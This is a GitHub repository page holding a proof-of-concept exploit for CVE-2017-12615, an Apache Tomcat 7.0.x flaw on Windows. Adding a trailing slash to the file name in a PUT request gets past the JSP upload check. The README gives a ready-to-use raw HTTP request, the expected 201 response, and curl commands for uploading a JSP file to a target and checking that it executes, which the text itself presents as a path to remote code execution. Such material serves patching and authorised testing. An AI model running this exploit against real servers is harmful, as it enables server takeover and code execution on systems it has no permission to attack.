Skip to content

breaktoprotect/CVE-2017-12615

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

In memory of Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

POC Exploit for Apache Tomcat 7.0.0 to 7.0.79 running on Windows; CVE-2017-12615 PUT JSP vulnerability.

Description:

By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. But seriously, special? Please.

Exploit method:

By appending a '/' character behind the filename's extension, one can bypass the file extension check. That's it. So, not that special actually.

Exploit in a Request Method:

Request

PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Expected response if successful

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit using 'curl':

  1. Create a .jsp file (e.g. test.jsp):
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. Perform the curl command on target server:
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. Check if your file is uploaded by browsing to the target address or:
curl http://target-host-or-ip-address:port/test.jsp

About

POC Exploit for Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP vulnerability.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published